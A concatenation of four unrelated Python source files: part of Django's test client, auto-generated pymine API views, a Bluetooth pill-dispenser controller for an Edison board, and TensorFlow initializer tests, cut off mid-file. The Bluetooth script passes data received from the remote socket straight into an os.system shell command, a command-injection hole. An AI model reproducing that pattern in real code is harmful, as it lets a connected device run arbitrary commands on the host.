'Content-Disposition: form-data; name="%s"' % key,
'',
item
]])
else:
lines.extend([to_bytes(val) for val in [
'--%s' % boundary,
'Content-Disposition: form-data; name="%s"' % key,
'',
value
]])
lines.extend([
to_bytes('--%s--' % boundary),
b'',
])
return b'\r\n'.join(lines)
def encode_file(boundary, key, file):
to_bytes = lambda s: force_bytes(s, settings.DEFAULT_CHARSET)
content_type = mimetypes.guess_type(file.name)[0]
if content_type is None:
content_type = 'application/octet-stream'
return [
to_bytes('--%s' % boundary),
to_bytes('Content-Disposition: form-data; name="%s"; filename="%s"' \
% (key, os.path.basename(file.name))),
to_bytes('Content-Type: %s' % content_type),
b'',
file.read()
]
class RequestFactory(object):
"""
Class that lets you create mock Request objects for use in testing.
Usage:
rf = RequestFactory()
get_request = rf.get('/hello/')
post_request = rf.post('/submit/', {'foo': 'bar'})
Once you have a request object you can pass it to any view function,
just as if that view had been hooked up using a URLconf.
"""
def __init__(self, **defaults):
self.defaults = defaults
self.cookies = SimpleCookie()
self.errors = BytesIO()
def _base_environ(self, **request):
"""
The base environment for a request.
"""
# This is a minimal valid WSGI environ dictionary, plus:
# - HTTP_COOKIE: for cookie support,
# - REMOTE_ADDR: often useful, see #8551.
# See http://www.python.org/dev/peps/pep-3333/#environ-variables
environ = {
'HTTP_COOKIE': self.cookies.output(header='', sep='; '),
'PATH_INFO': str('/'),
'REMOTE_ADDR': str('127.0.0.1'),
'REQUEST_METHOD': str('GET'),
'SCRIPT_NAME': str(''),
'SERVER_NAME': str('testserver'),
'SERVER_PORT': str('80'),
'SERVER_PROTOCOL': str('HTTP/1.1'),
'wsgi.version': (1, 0),
'wsgi.url_scheme': str('http'),
'wsgi.input': FakePayload(b''),
'wsgi.errors': self.errors,
'wsgi.multiprocess': True,
'wsgi.multithread': False,
'wsgi.run_once': False,
}
environ.update(self.defaults)
environ.update(request)
return environ
def request(self, **request):
"Construct a generic request object."
return WSGIRequest(self._base_environ(**request))
def _encode_data(self, data, content_type, ):
if content_type is MULTIPART_CONTENT:
return encode_multipart(BOUNDARY, data)
else:
# Encode the content so that the byte representation is correct.
match = CONTENT_TYPE_RE.match(content_type)
if match:
charset = match.group(1)
else:
charset = settings.DEFAULT_CHARSET
return force_bytes(data, encoding=charset)
def _get_path(self, parsed):
path = force_str(parsed[2])
# If there are parameters, add them
if parsed[3]:
path += str(";") + force_str(parsed[3])
path = unquote(path)
# WSGI requires latin-1 encoded strings. See get_path_info().
if six.PY3:
path = path.encode('utf-8').decode('iso-8859-1')
return path
def get(self, path, data={}, **extra):
"Construct a GET request."
parsed = urlparse(path)
query_string = urlencode(data, doseq=True) or force_str(parsed[4])
if six.PY3:
query_string = query_string.encode('utf-8').decode('iso-8859-1')
r = {
'PATH_INFO': self._get_path(parsed),
'QUERY_STRING': query_string,
'REQUEST_METHOD': str('GET'),
}
r.update(extra)
return self.request(**r)
def post(self, path, data={}, content_type=MULTIPART_CONTENT,
**extra):
"Construct a POST request."
post_data = self._encode_data(data, content_type)
parsed = urlparse(path)
query_string = force_str(parsed[4])
if six.PY3:
query_string = query_string.encode('utf-8').decode('iso-8859-1')
r = {
'CONTENT_LENGTH': len(post_data),
'CONTENT_TYPE': content_type,
'PATH_INFO': self._get_path(parsed),
'QUERY_STRING': query_string,
'REQUEST_METHOD': str('POST'),
'wsgi.input': FakePayload(post_data),
}
r.update(extra)
return self.request(**r)
def head(self, path, data={}, **extra):
"Construct a HEAD request."
parsed = urlparse(path)
query_string = urlencode(data, doseq=True) or force_str(parsed[4])
if six.PY3:
query_string = query_string.encode('utf-8').decode('iso-8859-1')
r = {
'PATH_INFO': self._get_path(parsed),
'QUERY_STRING': query_string,
'REQUEST_METHOD': str('HEAD'),
}
r.update(extra)
return self.request(**r)
def options(self, path, data='', content_type='application/octet-stream',
**extra):
"Construct an OPTIONS request."
return self.generic('OPTIONS', path, data, content_type, **extra)
def put(self, path, data='', content_type='application/octet-stream',
**extra):
"Construct a PUT request."
return self.generic('PUT', path, data, content_type, **extra)
def patch(self, path, data='', content_type='application/octet-stream',
**extra):
"Construct a PATCH request."
return self.generic('PATCH', path, data, content_type, **extra)
def delete(self, path, data='', content_type='application/octet-stream',
**extra):
"Construct a DELETE request."
return self.generic('DELETE', path, data, content_type, **extra)
def generic(self, method, path,
data='', content_type='application/octet-stream', **extra):
parsed = urlparse(path)
data = force_bytes(data, settings.DEFAULT_CHARSET)
r = {
'PATH_INFO': self._get_path(parsed),
'REQUEST_METHOD': str(method),
}
if data:
r.update({
'CONTENT_LENGTH': len(data),
'CONTENT_TYPE': str(content_type),
'wsgi.input': FakePayload(data),
})
r.update(extra)
# If QUERY_STRING is absent or empty, we want to extract it from the URL.
if not r.get('QUERY_STRING'):
query_string = force_bytes(parsed[4])
# WSGI requires latin-1 encoded strings. See get_path_info().
if six.PY3:
query_string = query_string.decode('iso-8859-1')
r['QUERY_STRING'] = query_string
return self.request(**r)
class Client(RequestFactory):
"""
A class that can act as a client for testing purposes.
It allows the user to compose GET and POST requests, and
obtain the response that the server gave to those requests.
The server Response objects are annotated with the details
of the contexts and templates that were rendered during the
process of serving the request.
Client objects are stateful - they will retain cookie (and
thus session) details for the lifetime of the Client instance.
This is not intended as a replacement for Twill/Selenium or
the like - it is here to allow testing against the
contexts and templates produced by a view, rather than the
HTML rendered to the end-user.
"""
def __init__(self, enforce_csrf_checks=False, **defaults):
super(Client, self).__init__(**defaults)
self.handler = ClientHandler(enforce_csrf_checks)
self.exc_info = None
def store_exc_info(self, **kwargs):
"""
Stores exceptions when they are generated by a view.
"""
self.exc_info = sys.exc_info()
def _session(self):
"""
Obtains the current session variables.
"""
if 'django.contrib.sessions' in settings.INSTALLED_APPS:
engine = import_module(settings.SESSION_ENGINE)
cookie = self.cookies.get(settings.SESSION_COOKIE_NAME, None)
if cookie:
return engine.SessionStore(cookie.value)
return {}
session = property(_session)
def request(self, **request):
"""
The master request method. Composes the environment dictionary
and passes to the handler, returning the result of the handler.
Assumes defaults for the query environment, which can be overridden
using the arguments to the request.
"""
environ = self._base_environ(**request)
# Curry a data dictionary into an instance of the template renderer
# callback function.
data = {}
on_template_render = curry(store_rendered_templates, data)
signals.template_rendered.connect(on_template_render, dispatch_uid="template-render")
# Capture exceptions created by the handler.
got_request_exception.connect(self.store_exc_info, dispatch_uid="request-exception")
try:
try:
response = self.handler(environ)
except TemplateDoesNotExist as e:
# If the view raises an exception, Django will attempt to show
# the 500.html template. If that template is not available,
# we should ignore the error in favor of re-raising the
# underlying exception that caused the 500 error. Any other
# template found to be missing during view error handling
# should be reported as-is.
if e.args != ('500.html',):
raise
# Look for a signalled exception, clear the current context
# exception data, then re-raise the signalled exception.
# Also make sure that the signalled exception is cleared from
# the local cache!
if self.exc_info:
exc_info = self.exc_info
self.exc_info = None
six.reraise(*exc_info)
# Save the client and request that stimulated the response.
response.client = self
response.request = request
# Add any rendered template detail to the response.
response.templates = data.get("templates", [])
response.context = data.get("context")
# Flatten a single context. Not really necessary anymore thanks to
# the __getattr__ flattening in ContextList, but has some edge-case
# backwards-compatibility implications.
if response.context and len(response.context) == 1:
response.context = response.context[0]
# Update persistent cookie data.
if response.cookies:
self.cookies.update(response.cookies)
return response
finally:
signals.template_rendered.disconnect(dispatch_uid="template-render")
got_request_exception.disconnect(dispatch_uid="request-exception")
def get(self, path, data={}, follow=False, **extra):
"""
Requests a response from the server using GET.
"""
response = super(Client, self).get(path, data=data, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def post(self, path, data={}, content_type=MULTIPART_CONTENT,
follow=False, **extra):
"""
Requests a response from the server using POST.
"""
response = super(Client, self).post(path, data=data, content_type=content_type, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def head(self, path, data={}, follow=False, **extra):
"""
Request a response from the server using HEAD.
"""
response = super(Client, self).head(path, data=data, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def options(self, path, data='', content_type='application/octet-stream',
follow=False, **extra):
"""
Request a response from the server using OPTIONS.
"""
response = super(Client, self).options(path,
data=data, content_type=content_type, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def put(self, path, data='', content_type='application/octet-stream',
follow=False, **extra):
"""
Send a resource to the server using PUT.
"""
response = super(Client, self).put(path,
data=data, content_type=content_type, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def patch(self, path, data='', content_type='application/octet-stream',
follow=False, **extra):
"""
Send a resource to the server using PATCH.
"""
response = super(Client, self).patch(
path, data=data, content_type=content_type, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def delete(self, path, data='', content_type='application/octet-stream',
follow=False, **extra):
"""
Send a DELETE request to the server.
"""
response = super(Client, self).delete(path,
data=data, content_type=content_type, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def login(self, **credentials):
"""
Sets the Factory to appear as if it has successfully logged into a site.
Returns True if login is possible; False if the provided credentials
are incorrect, or the user is inactive, or if the sessions framework is
not available.
"""
user = authenticate(**credentials)
if user and user.is_active \
and 'django.contrib.sessions' in settings.INSTALLED_APPS:
engine = import_module(settings.SESSION_ENGINE)
# Create a fake request to store login details.
request = HttpRequest()
if self.session:
request.session = self.session
else:
request.session = engine.SessionStore()
login(request, user)
# Save the session values.
request.session.save()
# Set the cookie to represent the session.
session_cookie = settings.SESSION_COOKIE_NAME
self.cookies[session_cookie] = request.session.session_key
cookie_data = {
'max-age': None,
'path': '/',
'domain': settings.SESSION_COOKIE_DOMAIN,
'secure': settings.SESSION_COOKIE_SECURE or None,
'expires': None,
}
self.cookies[session_cookie].update(cookie_data)
return True
else:
return False
def logout(self):
"""
Removes the authenticated user's cookies and session object.
Causes the authenticated user to be logged out.
"""
request = HttpRequest()
engine = import_module(settings.SESSION_ENGINE)
UserModel = get_user_model()
if self.session:
request.session = self.session
uid = self.session.get("_auth_user_id")
if uid:
request.user = UserModel._default_manager.get(pk=uid)
else:
request.session = engine.SessionStore()
logout(request)
self.cookies = SimpleCookie()
def _handle_redirects(self, response, **extra):
"Follows any redirects by requesting responses from the server using GET."
response.redirect_chain = []
while response.status_code in (301, 302, 303, 307):
url = response.url
redirect_chain = response.redirect_chain
redirect_chain.append((url, response.status_code))
url = urlsplit(url)
if url.scheme:
extra['wsgi.url_scheme'] = url.scheme
if url.hostname:
extra['SERVER_NAME'] = url.hostname
if url.port:
extra['SERVER_PORT'] = str(url.port)
response = self.get(url.path, QueryDict(url.query), follow=False, **extra)
response.redirect_chain = redirect_chain
# Prevent loops
if response.redirect_chain[-1] in response.redirect_chain[0:-1]:
break
return response
|
|
#!/usr/bin/env python
##
## Copyright 2010 Adriana Lukas & Alec Muffett
##
## Licensed under the Apache License, Version 2.0 (the "License"); you
## may not use this file except in compliance with the License. You
## may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
## implied. See the License for the specific language governing
## permissions and limitations under the License.
##
"""docstring goes here""" # :-)
from django.conf import settings
from django.http import HttpResponse
from pymine.api.envelope import Envelope
from pymine.api.models import Comment, Item, Registry
import pymine.util.httpserve as httpserve
##################################################################
# this definition (create_comment) is auto-generated.
# ensure that any changes are made via the generator.
def create_comment(request, idz, **kwargs):
"""
arguments: request, idz, **kwargs
implements: POST /api/comment/item/(IDZ).(FMT)
returns: an envelope containing the comment structure
"""
m = Comment.create(request, commentUponItem=int(idz))
return Envelope(request, result={ m.thing_prefix : m.to_structure(request) })
##################################################################
# this definition (create_thing) is auto-generated.
# ensure that any changes are made via the generator.
def create_thing(request, thyng, **kwargs):
"""
arguments: request, thyng, **kwargs
implements: POST /api/feed.(FMT)
implements: POST /api/item.(FMT)
implements: POST /api/tag.(FMT)
implements: POST /api/vurl.(FMT)
returns: an envelope containing the thing structure
"""
m = thyng.create(request)
convert = getattr(m, 'to_structure', None)
if convert: # its a single Thing
s = { m.thing_prefix : convert(request) }
else: # is a list of Thing, or something that we assume to be sane
s = m
return Envelope(request, result=s)
##################################################################
# this definition (delete_registry_attr) is auto-generated.
# ensure that any changes are made via the generator.
def delete_registry_attr(request, rattr, **kwargs):
"""
arguments: request, rattr, **kwargs
implements: DELETE /api/registry/(RATTR).(FMT)
returns: an empty envelope
"""
m = Registry.get(key=rattr)
m.delete()
return Envelope(request, result=0)
##################################################################
# this definition (delete_thing) is auto-generated.
# ensure that any changes are made via the generator.
def delete_thing(request, thyng, id, **kwargs):
"""
arguments: request, thyng, id, **kwargs
implements: DELETE /api/comment/(ID).(FMT)
implements: DELETE /api/feed/(ID).(FMT)
implements: DELETE /api/item/(ID).(FMT)
implements: DELETE /api/tag/(ID).(FMT)
implements: DELETE /api/vurl/(ID).(FMT)
returns: an empty envelope
"""
m = thyng.get(id=int(id))
m.delete()
return Envelope(request, result=0)
##################################################################
# this definition (delete_thing_attr) is auto-generated.
# ensure that any changes are made via the generator.
def delete_thing_attr(request, thyng, id, attr, **kwargs):
"""
arguments: request, thyng, id, attr, **kwargs
implements: DELETE /api/comment/(ID)/(ATTR).(FMT)
implements: DELETE /api/feed/(ID)/(ATTR).(FMT)
implements: DELETE /api/item/(ID)/(ATTR).(FMT)
implements: DELETE /api/tag/(ID)/(ATTR).(FMT)
implements: DELETE /api/vurl/(ID)/(ATTR).(FMT)
returns: ...
"""
m = thyng.get(id=int(id))
m.delete_attribute(attr)
return Envelope(request, result={ m.thing_prefix : m.to_structure(request) })
##################################################################
# this definition (encode_minekey) is auto-generated.
# ensure that any changes are made via the generator.
def encode_minekey(request, **kwargs):
"""
arguments: request, **kwargs
implements: POST /api/encode.(FMT)
returns: ...
"""
s = {}
return Envelope(request, result=s)
##################################################################
# this definition (get_registry_attr) is auto-generated.
# ensure that any changes are made via the generator.
def get_registry_attr(request, rattr, **kwargs):
"""
arguments: request, rattr, **kwargs
implements: GET /api/registry/(RATTR).(FMT)
returns: ...
"""
m = Registry.get(key=rattr)
return Envelope(request, result=m.value)
##################################################################
# this definition (get_thing_attr) is auto-generated.
# ensure that any changes are made via the generator.
def get_thing_attr(request, thyng, id, attr, **kwargs):
"""
arguments: request, thyng, id, attr, **kwargs
implements: GET /api/comment/(ID)/(ATTR).(FMT)
implements: GET /api/feed/(ID)/(ATTR).(FMT)
implements: GET /api/item/(ID)/(ATTR).(FMT)
implements: GET /api/tag/(ID)/(ATTR).(FMT)
implements: GET /api/vurl/(ID)/(ATTR).(FMT)
returns: ...
"""
m = thyng.get(id=int(id))
s = m.to_structure(request)
return Envelope(request, result=s[attr]) # throw exception if not there
##################################################################
# this definition (list_comments) is auto-generated.
# ensure that any changes are made via the generator.
def list_comments(request, idz, **kwargs):
"""
arguments: request, idz, **kwargs
implements: GET /api/comment/item/(IDZ).(FMT)
returns: ...
"""
iid = int(idz)
if iid == 0:
qs = Comment.list()
else:
item = Item.get(id=iid)
qs = item.comment_set.filter(is_deleted=False)
if 'query' in request.REQUEST:
qs = Comment.execute_search_query(request.REQUEST['query'], qs)
result = [ { m.thing_prefix : m.to_structure(request) } for m in qs ]
return Envelope(request, result=result)
##################################################################
# this definition (list_registry) is auto-generated.
# ensure that any changes are made via the generator.
def list_registry(request, **kwargs):
"""
arguments: request, **kwargs
implements: GET /api/registry.(FMT)
returns: ...
"""
qs = Registry.objects.all()
result = [ m.to_structure(request) for m in qs ]
return Envelope(request, result=result)
##################################################################
# this definition (list_things) is auto-generated.
# ensure that any changes are made via the generator.
def list_things(request, thyng, **kwargs):
"""
arguments: request, thyng, **kwargs
implements: GET /api/feed.(FMT)
implements: GET /api/item.(FMT)
implements: GET /api/tag.(FMT)
implements: GET /api/vurl.(FMT)
returns: ...
"""
qs = thyng.list()
if 'query' in request.REQUEST:
qs = thyng.execute_search_query(request.REQUEST['query'], qs)
result = [ { m.thing_prefix : m.to_structure(request) } for m in qs ]
return Envelope(request, result=result)
##################################################################
# this definition (read_item_data) is auto-generated.
# ensure that any changes are made via the generator.
def read_item_data(request, id, token, **kwargs):
"""
arguments: request, id, token, **kwargs
implements: GET /api/data/(ID)(/TOKEN)
returns: ...
"""
m = Item.get(id=int(id))
ct = m.data_type
if m.data:
f = m.data.chunks()
response = HttpResponse(f, content_type=ct)
response['Content-Length'] = m.data.size
else:
d = m.feed_description()
response = HttpResponse(d)
response['Content-Length'] = len(d)
return response
##################################################################
# this definition (read_item_icon) is auto-generated.
# ensure that any changes are made via the generator.
def read_item_icon(request, id, token, **kwargs):
"""
arguments: request, id, token, **kwargs
implements: GET /api/icon/(ID)(/TOKEN)
returns: ...
"""
return httpserve.httpserve_path(request, 'images/icon.png')
##################################################################
# this definition (read_thing) is auto-generated.
# ensure that any changes are made via the generator.
def read_thing(request, thyng, id, **kwargs):
"""
arguments: request, thyng, id, **kwargs
implements: GET /api/comment/(ID).(FMT)
implements: GET /api/feed/(ID).(FMT)
implements: GET /api/item/(ID).(FMT)
implements: GET /api/tag/(ID).(FMT)
implements: GET /api/vurl/(ID).(FMT)
returns: ...
"""
m = thyng.get(id=int(id))
return Envelope(request, result={ m.thing_prefix : m.to_structure(request) })
##################################################################
# this definition (read_version) is auto-generated.
# ensure that any changes are made via the generator.
def read_version(request, **kwargs):
"""
arguments: request, **kwargs
implements: GET /api/version.(FMT)
returns: ...
"""
vinfo = {
'mineApiVersion': settings.MINE_API_VERSION,
'softwareName': settings.MINE_SW_NAME,
'softwareMajorVersion': settings.MINE_SW_MAJOR_VERSION,
'softwareMinorVersion': settings.MINE_SW_MINOR_VERSION,
'softwareStatus': settings.MINE_SW_STATUS,
}
return Envelope(request, result=dict(version=vinfo))
##################################################################
# this definition (update_registry_attr) is auto-generated.
# ensure that any changes are made via the generator.
def update_registry_attr(request, rattr, **kwargs):
"""
arguments: request, rattr, **kwargs
implements: POST /api/registry/(RATTR).(FMT)
returns: ...
"""
v = request.POST[rattr]
m, created = Registry.objects.get_or_create(key=rattr, defaults={ 'value': v })
if not created: # then it will need updating
m.value = v
m.save();
return Envelope(request, result=m.to_structure(request))
##################################################################
# this definition (update_thing) is auto-generated.
# ensure that any changes are made via the generator.
def update_thing(request, thyng, id, **kwargs):
"""
arguments: request, thyng, id, **kwargs
implements: POST /api/comment/(ID).(FMT)
implements: POST /api/feed/(ID).(FMT)
implements: POST /api/item/(ID).(FMT)
implements: POST /api/tag/(ID).(FMT)
implements: POST /api/vurl/(ID).(FMT)
returns: ...
"""
m = thyng.get(id=int(id))
m = m.update(request)
return Envelope(request, result={ m.thing_prefix : m.to_structure(request) })
##################################################################
|
|
#!/usr/bin/python
# bluetooth manager
# libraries
from __future__ import absolute_import, print_function, unicode_literals
from optparse import OptionParser, make_option
import os
import sys
import socket
import uuid
import dbus
import dbus.service
import dbus.mainloop.glib
try:
from gi.repository import GObject
except ImportError:
import gobject as GObject
import mraa
import time
# setup gpio
x = mraa.Gpio(13)
x.dir(mraa.DIR_OUT)
def readSock(sock):
print("<<<")
buff=""
while True:
c=sock.recv(1)
if not c:
print("NO DATA")
break
if c=='\r':
c=sock.recv(1)
return buff
if c=='\n':
return buff
else:
buff+=c
class Profile(dbus.service.Object):
fd = -1
@dbus.service.method("org.bluez.Profile1",
in_signature="", out_signature="")
def Release(self):
print("Release")
mainloop.quit()
@dbus.service.method("org.bluez.Profile1",
in_signature="", out_signature="")
def Cancel(self):
print("Cancel")
@dbus.service.method("org.bluez.Profile1",
in_signature="oha{sv}", out_signature="")
def NewConnection(self, path, fd, properties):
self.fd = fd.take()
print("NewConnection(%s, %d)" % (path, self.fd))
server_sock = socket.fromfd(self.fd, socket.AF_UNIX, socket.SOCK_STREAM)
server_sock.setblocking(1)
server_sock.settimeout(1)
while True:
try:
print("Sending time...")
configdata=time.strftime("%H:%M")
print(configdata+"\n",end="")
server_sock.send("D\n"+configdata+"\n")
time.sleep(0.5)
data = readSock(server_sock)
print("Received: " + data)
time.sleep(1)
print("Requesting pills to release...")
server_sock.send("P\n")
time.sleep(0.1)
s1 = readSock(server_sock)
s2 = readSock(server_sock)
s3 = readSock(server_sock)
print("Received: ")
print(" s1= "+s1)
print(" s2= "+s2)
print(" s3= "+s3)
if s1 == '1':
print("Releasing Pill 1")
os.system(os.getcwd() + "/py-servo/servo.py 1")
if s2 == '1':
print("Releasing Pill 2")
os.system(os.getcwd() + "/py-servo/servo.py 2")
if s3 == '1' :
print("Releasing Pill 3")
os.system(os.getcwd() + "/py-servo/servo.py 3")
time.sleep(1)
print("Requesting heartbeat...")
server_sock.send("H\n")
time.sleep(0.1)
data = readSock(server_sock)
print("Received: " + data)
os.system(os.getcwd() + "/savedata.py '" + data + "'" )
time.sleep(1)
print("Reading config...")
configdata = os.popen(os.getcwd() + "/readconfig.py").read()
# configdata = "13:00\n14:00\n-"
print("{")
print(configdata)
print("}")
print("Sending config...")
server_sock.send("C\n"+configdata)
# server_sock.send("C\n13:00\n14:00\n-")
#server_sock.send("13:00\n")
#server_sock.send("13:00\n")
#server_sock.send("-\n")
time.sleep(0.5)
data = readSock(server_sock)
print("Received: " + data)
time.sleep(1)
except IOError:
print("IOError")
print("Clear buffer: ")
#print(readSock(server_sock))
pass
server_sock.close()
print("all done")
@dbus.service.method("org.bluez.Profile1",
in_signature="o", out_signature="")
def RequestDisconnection(self, path):
print("RequestDisconnection(%s)" % (path))
if (self.fd > 0):
os.close(self.fd)
self.fd = -1
# main loop
if __name__ == '__main__':
print("Waiting for connections...")
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
bus = dbus.SystemBus()
manager = dbus.Interface(bus.get_object("org.bluez",
"/org/bluez"), "org.bluez.ProfileManager1")
option_list = [
make_option("-C", "--channel", action="store",
type="int", dest="channel",
default=None),
]
parser = OptionParser(option_list=option_list)
(options, args) = parser.parse_args()
options.uuid = "1101"
# options.uuid = "00001101-0000-1000-8000-00805f9b34fb"
options.psm = "3"
options.role = "slave"
options.name = "Edison SPP Loopback"
options.service = "spp char loopback"
options.path = "/foo/bar/profile"
options.auto_connect = True
options.record = ""
profile = Profile(bus, options.path)
mainloop = GObject.MainLoop()
opts = {
"AutoConnect" : options.auto_connect,
}
if (options.name):
opts["Name"] = options.name
if (options.role):
opts["Role"] = options.role
if (options.psm is not None):
opts["PSM"] = dbus.UInt16(options.psm)
if (options.channel is not None):
opts["Channel"] = dbus.UInt16(options.channel)
if (options.record):
opts["ServiceRecord"] = options.record
if (options.service):
opts["Service"] = options.service
if not options.uuid:
options.uuid = str(uuid.uuid4())
manager.RegisterProfile(options.path, options.uuid, opts)
mainloop.run()
|
|
"""Tests for tensorflow.ops.ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.python.platform
import numpy as np
import tensorflow as tf
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import init_ops
# Returns true iff the two initalizers produce the same tensor to
# within a tiny tolerance.
def identicaltest(tc, init1, init2, use_gpu):
"""Tests if two initializations are identical to within tiny tolerances.
Args:
tc: An instance of TensorFlowTestCase.
init1: An Initializer that generates a tensor of a given shape
init2: An Initializer that generates a tensor of a given shape
use_gpu: Use gpu if true.
Returns:
True or False as determined by test.
"""
num = 100
with tc.test_session(use_gpu=use_gpu, graph=tf.Graph()):
t1 = init1([num]).eval()
with tc.test_session(use_gpu=use_gpu, graph=tf.Graph()):
t2 = init2([num]).eval()
return np.allclose(t1, t2, rtol=1e-15, atol=1e-15)
def duplicated_initializer(tc, init, use_gpu, graph_seed):
"""Tests duplicated random initializer within the same graph.
This test generates two random kernels from the same initializer to the same
graph, and checks if the results are close enough. Even given the same global,
seed, two different instances of random kernels should generate different
results.
Args:
tc: An instance of TensorFlowTestCase.
init: An Initializer that generates a tensor of a given shape
use_gpu: Use gpu if true.
graph_seed: A graph-level seed to use.
Returns:
True or False as determined by test.
"""
num = 100
with tc.test_session(use_gpu=use_gpu, graph=tf.Graph()):
random_seed.set_random_seed(graph_seed)
t1 = init([num]).eval()
t2 = init([num]).eval()
return np.allclose(t1, t2, rtol=1e-15, atol=1e-15)
def _init_sampler(tc, init, num, use_gpu):
"""Returns a func to generate a random tensor of shape [num].
Args:
tc: An instance of TensorFlowTestCase.
init: An Initializer that generates a tensor of a given shape
num: Size of 1D tensor to create.
use_gpu: Use gpu if true.
Returns:
Function to generate a random tensor.
"""
def func():
with tc.test_session(use_gpu=use_gpu):
return init([num]).eval()
return func
class RandomNormalInitializationTest(tf.test.TestCase):
def testInitializerIdentical(self):
for use_gpu in [False, True]:
init1 = tf.random_normal_initializer(0.0, 1.0, seed=1)
init2 = tf.random_normal_initializer(0.0, 1.0, seed=1)
self.assertTrue(identicaltest(self, init1, init2, use_gpu))
def testInitializerDifferent(self):
for use_gpu in [False, True]:
init1 = tf.random_normal_initializer(0.0, 1.0, seed=1)
init2 = tf.random_normal_initializer(0.0, 1.0, seed=2)
self.assertFalse(identicaltest(self, init1, init2, use_gpu=use_gpu))
def testDuplicatedInitializer(self):
for use_gpu in [False, True]:
init = tf.random_normal_initializer(0.0, 1.0)
self.assertFalse(duplicated_initializer(self, init, use_gpu, 1))
class TruncatedNormalInitializationTest(tf.test.TestCase):
def testInitializerIdentical(self):
for use_gpu in [False, True]:
init1 = tf.truncated_normal_initializer(0.0, 1.0, seed=1)
init2 = tf.truncated_normal_initializer(0.0, 1.0, seed=1)
self.assertTrue(identicaltest(self, init1, init2, use_gpu))
def testInitializerDifferent(self):
for use_gpu in [False, True]:
init1 = tf.truncated_normal_initializer(0.0, 1.0, seed=1)
init2 = tf.truncated_normal_initializer(0.0, 1.0, seed=2)
self.assertFalse(identicaltest(self, init1, init2, use_gpu=use_gpu))
def testDuplicatedInitializer(self):
for use_gpu in [False, True]:
init = tf.truncated_normal_initializer(0.0, 1.0)
self.assertFalse(duplicated_initializer(self, init, use_gpu, 1))
class RandomUniformInitializationTest(tf.test.TestCase):
def testInitializerIdentical(self):
for use_gpu in [False, True]:
init1 = tf.random_uniform_initializer(0.0, 1.0, seed=1)
init2 = tf.random_uniform_initializer(0.0, 1.0, seed=1)
self.assertTrue(identicaltest(self, init1, init2, use_gpu))
def testInitializerDifferent(self):
for use_gpu in [False, True]:
init1 = tf.random_uniform_initializer(0.0, 1.0, seed=1)
init2 = tf.random_uniform_initializer(0.0, 1.0, seed=2)
self.assertFalse(identicaltest(self, init1, init2, use_gpu))
def testDuplicatedInitializer(self):
for use_gpu in [False, True]:
init = tf.random_uniform_initializer(0.0, 1.0)
self.assertFalse(duplicated_initializer(self, init, use_gpu, 1))
class UniformUnitScalingInitializationTest(tf.test.TestCase):
def testInitializerIdentical(self):
for use_gpu in [False, True]:
init1 = tf.uniform_unit_scaling_initializer(seed=1)
init2 = tf.uniform_unit_scaling_initializer(seed=1)
self.assertTrue(identicaltest(self, init1, init2, use_gpu))
init3 = tf.uniform_unit_scaling_initializer(1.5, seed=1)
init4 = tf.uniform_unit_scaling_initializer(1.5, seed=1)
self.assertTrue(identicaltest(self, init3, init4, use_gpu))
def testInitializerDifferent(self):
for use_gpu in [False, True]:
init1 = tf.uniform_unit_scaling_initializer(seed=1)
init2 = tf.uniform_unit_scaling_initializer(seed=2)
init3 = tf.uniform_unit_scaling_initializer(1.5, seed=1)
self.assertFalse(identicaltest(self, init1, init2, use_gpu))
self.assertFalse(identicaltest(self, init1, init3, use_gpu))
self.assertFalse(identicaltest(self, init2, init3, use_gpu))
def testDuplicatedInitializer(self):
for use_gpu in [False, True]:
init = tf.uniform_unit_scaling_initializer()
self.assertFalse(duplicated_initializer(self, init, use_gpu, 1))
class RandomWalkShapeTest(tf.test.TestCase):
def testRandomWalk(self):
# Fully known shape.
rnd1 = init_ops._random_walk([1, 2], tf.nn.relu)
self.assertEqual([1, 2], rnd1.get_shape())
# TODO(vrv): move to sequence_ops_test?
class RangeTest(tf.test.TestCase):
def _Range(self, start, limit, delta):
with self.test_session():
tf_ans = tf.range(start, limit, delta, name="range")
self.assertEqual([len(range(start, limit, delta))], tf_ans.get_shape())
return tf_ans.eval()
def testBasic(self):
self.assertTrue(np.array_equal(
self._Range(0, 5, 1), np.array([0, 1, 2, 3, 4])))
self.assertTrue(np.array_equal(
self._Range(0, 5, 2), np.array([0, 2, 4])))
self.assertTrue(np.array_equal(
self._Range(0, 6, 2), np.array([0, 2, 4])))
self.assertTrue(np.array_equal(
self._Range(13, 32, 7), np.array([13, 20, 27])))
self.assertTrue(np.array_equal(
self._Range(100, 500, 100), np.array([100, 200, 300, 400])))
self.assertEqual(tf.range(0, 5, 1).dtype, tf.int32)
def testLimitOnly(self):
with self.test_session():
self.assertAllEqual(np.arange(5), tf.range(5).eval())
def testEmpty(self):
for start in 0, 5:
self.assertTrue(np.array_equal(self._Range(start, start, 1), []))
# TODO(vrv): move to sequence_ops_test?
class LinSpaceTest(tf.test.TestCase):
def _LinSpace(self, start, stop, num):
with self.test_session():
tf_ans = tf.linspace(start, stop, num, name="linspace")
self.assertEqual([num], tf_ans.get_shape())
return tf_ans.eval()
def testPositive(self):
self.assertArrayNear(self._LinSpace(1., 5., 1), np.array([1.]), 1e-5)
self.assertArrayNear(self._LinSpace(1., 5., 2), np.array([1., 5.]), 1e-5)
self.assertArrayNear(self._LinSpace(1., 5., 3),
np.array([1., 3., 5.]), 1e-5)
self.assertArrayNear(self._LinSpace(1., 5., 4),
np.array([1., 7. / 3., 11. / 3., 5.]), 1e-5)
def testNegative(self):
self.assertArrayNear(self._LinSpace(-1., -5., 1), np.array([-1.]), 1e-5)
self.assertArrayNear(self._LinSpace(-1., -5., 2),
np.array([-1., -5.]), 1e-5)
self.assertArrayNear(self._LinSpace(-1., -5., 3),
np.array([-1., -3., -5.]), 1e-5)
self.assertArrayNear(self._LinSpace(-1., -5., 4),
